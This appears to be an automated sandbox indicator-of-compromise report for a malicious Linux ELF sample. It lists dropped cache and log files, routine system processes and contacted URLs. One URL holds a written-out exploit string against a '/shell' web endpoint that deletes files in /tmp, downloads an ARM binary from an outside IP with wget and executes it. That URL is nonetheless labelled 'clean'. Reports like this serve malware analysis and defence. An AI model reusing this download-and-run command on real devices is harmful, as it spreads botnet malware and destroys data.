IOC Report


Files

File Path | Type | Category | Verdict
1xtO9V8ku8 | ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped | initial sample | malicious
/var/cache/man/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/cs/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/cs/index.db.OidWsZ | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/da/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/da/index.db.Tx9djV | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/de/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/de/index.db.QeAR9Y | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/es/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/es/index.db.7BpmSY | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/fi/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/fi/index.db.UDmH4W | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/fr.ISO8859-1/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/fr.ISO8859-1/index.db.93HFlX | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/fr.UTF-8/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/fr.UTF-8/index.db.1j2FZY | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/fr/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/fr/index.db.kCK1BY | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/hu/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/hu/index.db.oktA6X | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/id/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/id/index.db.Yrsi7X | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/index.db.C1CCCV | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/it/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/it/index.db.Oz0gYV | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/ja/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/ja/index.db.XKudCZ | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/ko/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/ko/index.db.CHkWlX | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/nl/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/nl/index.db.GufyBY | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/pl/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/pl/index.db.a5HjTW | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/pt/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/pt/index.db.L3jLjW | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/pt_BR/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/pt_BR/index.db.oojnzZ | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/ru/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/ru/index.db.AC78mY | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/sl/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/sl/index.db.pkc8DW | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/sr/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/sr/index.db.S5MaDX | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/sv/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/sv/index.db.NVNacY | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/tr/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/tr/index.db.OMgcpY | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/zh_CN/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/zh_CN/index.db.zJimoZ | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/zh_TW/5419 | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/cache/man/zh_TW/index.db.jpfpKZ | GNU dbm 1.x or ndbm database, little endian, 64-bit | dropped | clean
/var/lib/logrotate/status.tmp | ASCII text | dropped | clean
/var/log/cups/access_log.1.gz | gzip compressed data, last modified: Fri Jan 14 22:56:00 2022, from Unix | dropped | clean
/var/log/syslog.1.gz | gzip compressed data, last modified: Fri Jan 14 22:56:01 2022, from Unix | dropped | clean

(44 further files are not shown in this report.)

Processes

Path | Cmdline | Verdict
/tmp/1xtO9V8ku8 | /tmp/1xtO9V8ku8 | clean
/tmp/1xtO9V8ku8 | n/a | clean
/tmp/1xtO9V8ku8 | n/a | clean
/tmp/1xtO9V8ku8 | n/a | clean
/tmp/1xtO9V8ku8 | n/a | clean
/tmp/1xtO9V8ku8 | n/a | clean
/tmp/1xtO9V8ku8 | n/a | clean
/usr/lib/systemd/systemd | n/a | clean
/usr/sbin/logrotate | /usr/sbin/logrotate /etc/logrotate.conf | clean
/usr/sbin/logrotate | n/a | clean
/bin/gzip | /bin/gzip | clean
/usr/sbin/logrotate | n/a | clean
/bin/sh | sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log " | clean
/bin/sh | n/a | clean
/usr/sbin/invoke-rc.d | invoke-rc.d --quiet cups restart | clean
/usr/sbin/invoke-rc.d | n/a | clean
/sbin/runlevel | /sbin/runlevel | clean
/usr/sbin/invoke-rc.d | n/a | clean
/usr/bin/systemctl | systemctl --quiet is-enabled cups.service | clean
/usr/sbin/invoke-rc.d | n/a | clean
/usr/bin/ls | ls /etc/rc[S2345].d/S[0-9][0-9]cups | clean
/usr/sbin/invoke-rc.d | n/a | clean
/usr/bin/systemctl | systemctl --quiet is-active cups.service | clean
/usr/sbin/logrotate | n/a | clean
/bin/gzip | /bin/gzip | clean
/usr/sbin/logrotate | n/a | clean
/bin/sh | sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog | clean
/bin/sh | n/a | clean
/usr/lib/rsyslog/rsyslog-rotate | /usr/lib/rsyslog/rsyslog-rotate | clean
/usr/lib/rsyslog/rsyslog-rotate | n/a | clean
/usr/bin/systemctl | systemctl kill -s HUP rsyslog.service | clean
/usr/lib/systemd/systemd | n/a | clean
/usr/bin/install | /usr/bin/install -d -o man -g man -m 0755 /var/cache/man | clean
/usr/lib/systemd/systemd | n/a | clean
/usr/bin/find | /usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete | clean
/usr/lib/systemd/systemd | n/a | clean
/usr/bin/mandb | /usr/bin/mandb --quiet | clean

(27 further processes are not shown in this report.)

URLs

Name | IP | Verdict
http://upx.sf.net | unknown | clean
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws | 23.133.5.5 | clean

IPs

(90 further IPs are not shown in this report.)